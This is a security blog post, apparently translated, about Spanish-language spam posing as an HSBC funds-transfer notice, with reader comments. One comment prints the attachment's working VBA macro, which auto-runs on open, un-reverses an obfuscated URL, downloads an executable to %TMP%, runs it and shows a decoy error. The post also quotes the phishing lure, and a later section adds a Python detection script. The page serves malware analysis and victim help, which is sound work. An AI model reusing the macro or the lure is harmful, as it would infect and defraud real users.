Thursday, 17 July 2014

"Notificación de transferencia de fondos a su favor" spam

This Spanish-language spam has a malicious Word document as an attachment.

From:     HSBC Transferencias [Mexico_contacto@hsbc.com.mx]
Reply-To:     respuesta@hsbc.com.mx
Date:     17 July 2014 11:01

WELCOME TO HSBC!

The purpose of this e-mail is to inform you that today you received an SPEI transfer, which is being held due to anomalies in your account. For more details on this situation we attach a Microsoft Word document explaining the reason for the hold and the steps to follow.

Issuing bank: BBVA BANCOMER
Amount: $94,000.00
Date: 17/07/2014
Folio: 89413

Status: Held
We recommend following the steps described in the document attached to this e-mail.

For any questions or clarifications we are at your service at contacto@hsbc.com.mx or, if you prefer, you can contact Internet Banking on the following telephone numbers:
     México D.F. (55) 5721 1635
     From any state of the Republic, toll-free, at 01800 4722 638.

We will be glad to assist you

The attachment is essentially the same as the one mentioned here, which tries to lure the victim into disabling their Word macro security settings so that a malicious macro can run.

The VirusTotal detection rate is a pretty poor 4/54. You can see some of the text strings in the Malwr report, which include a reversed URL, exe.ss/pw/arc/lc.paip//:ptth, that the macro un-reverses at run time to http://piap.cl/cra/wp/ss.exe and then tries to download a file from (currently 404ing). The VBA in the document can be found here [pastebin].

As mentioned before, this is a long-running campaign apparently targeting users in Mexico, and as yet I have not seen this in any language except Spanish.

8 comments:

  1. This comment has been removed by the author.

  2. Thank you so much, I received this same email yesterday, had no idea what to do until I saw the properties and saw the "modified by "clein"", so I started looking for that name and found your blog. My sister opened the document and activated the macros yesterday, I don't know what to do, the PC isn't behaving suspiciously at all. What should I do? Greetings from México

    edit: When my sister opened the document it said it isn't compatible with my PC. Also, she said it didn't download anything after opening.

  3. Hi, how do I know I'm not infected with some virus? I also opened it by accident.

  4. This is the code that runs, be careful. It's VBA and, as the post says, it downloads files onto your computer:

    Private Sub Auto_Open()
        ' Excel auto-run entry point
        Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
    End Sub
    Private Sub Workbook_Open()
        ' Excel workbook open event
        Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
    End Sub
    Private Sub AutoExec()
        ' Word global-template auto-run entry point
        Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
    End Sub
    Private Sub AutoOpen()
        ' Word auto-run entry point
        Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
    End Sub
    Private Sub Document_Open()
        ' Word document open event
        Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
    End Sub
    ' Fetches the URL, writes the response under %TMP% (SavePath defaults to "TMP") and launches it.
    ' The URL is stored reversed so a plain string scan of the document does not see "http://".
    ' RunAfterDownload and RunHide are never used: the file is always run with a visible window.
    Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
        On Error Resume Next    ' swallow every error so the document never shows a failure
        Err.Clear

        Set XML = CreateObject("Microsoft.XMLHTTP")
        Set ADS = CreateObject("ADODB.Stream")

        XML.Open "GET", URL, False
        XML.send

        XML.getAllResponseHeaders

        FullSavePath = Environ(SavePath) & "\" & SaveName

        ADS.Open
        ADS.Type = 1                      ' adTypeBinary
        ADS.Write XML.responseBody
        ADS.SaveToFile FullSavePath, 2    ' adSaveCreateOverWrite

        Shell FullSavePath, vbNormalFocus ' run the downloaded executable
        DownloadFile = True
        ' Decoy "not compatible" error shown only after the payload has already been launched
        MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
        ' Spin a couple of iterations, then close Office silently without the save prompt
        Dim z
        z = 0
        Do While 1 = 1
            If z = 2 Then
                Application.DisplayAlerts = False
                Application.Quit
            End If
            z = z + 1
        Loop
    End Function

  5. Possibly, from what I understand, it downloads to the Temp folder; in my case that is

    C:\Users\[usuario]\AppData\Local\Temp

    It would be a matter of looking in that folder for the files

    4b646n46.exe
    rsd54tgs.exe
    ds8fydsa89f7.exe
    fsfsfsdsd.exe
    hjhhjhjhjhj.exe

    and, if they are there, deleting them and running a scan of the computer.

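Detection logic for this kind of macro, as an added example that is not part of the original post or its comments: it takes a constructed VBA sample modelled on the macro quoted above, lists the auto-execute entry points, reverses the StrReverse() string to recover the real URL given in the post, and derives the %TMP% drop paths the previous comment suggests checking. The sample text and the analyse_vba function are my own, not from the malware or the blog.

```python
import re

# Constructed sample modelled on the macro quoted in the comments (not the real attachment).
SAMPLE_VBA = '''Private Sub Auto_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
End Sub
Private Sub Document_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
End Sub
Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP")
Set XML = CreateObject("Microsoft.XMLHTTP")
Set ADS = CreateObject("ADODB.Stream")
Shell FullSavePath, vbNormalFocus
End Function
'''

# Procedure names Office runs automatically when a document or workbook opens.
AUTOEXEC = {"auto_open", "autoopen", "autoexec", "workbook_open", "document_open"}
# Objects and statements the macro needs to fetch a payload and launch it.
DOWNLOAD_EXEC = ("Microsoft.XMLHTTP", "ADODB.Stream", "Shell")
API_RE = re.compile(r"\b(" + "|".join(map(re.escape, DOWNLOAD_EXEC)) + r")\b")
PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)
STRREV_RE = re.compile(r'StrReverse\(\s*"([^"]*)"\s*\)', re.I)
DROP_RE = re.compile(r'DownloadFile\([^,]+,\s*"([^"]+)"', re.I)


def analyse_vba(src):
    """Return auto-exec triggers, de-obfuscated URLs, drop names/paths and a verdict."""
    procs = PROC_RE.findall(src)
    triggers = sorted({p for p in procs if p.lower() in AUTOEXEC})
    # StrReverse("...") is the obfuscation used here: reverse the literal to get the real URL.
    urls = sorted({s[::-1] for s in STRREV_RE.findall(src)})
    drops = sorted(set(DROP_RE.findall(src)))
    apis = sorted(set(API_RE.findall(src)))
    # SavePath defaults to "TMP", so each payload lands at %TMP%\<SaveName>.
    drop_paths = ["%TMP%\\" + n for n in drops]
    verdict = "malicious downloader" if triggers and urls and "Shell" in apis else "review"
    return {"triggers": triggers, "urls": urls, "drops": drops, "apis": apis,
            "drop_paths": drop_paths, "verdict": verdict}


if __name__ == "__main__":
    for key, value in analyse_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```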
  6. This comment has been removed by the author.

  7. @Cosas extrañamente normales: I think opening it is harmless unless you have disabled the Macro security.

  8. @Conrad Longmore It looks like the macro security was disabled. Just noted my PC opens IE on startup. I did what Cesar Alejandro Amezcua Tejeda said.

    btw

    Thanks @Cesar Alejandro Amezcua Tejeda, if I find anything else in the scan I'll write it here.
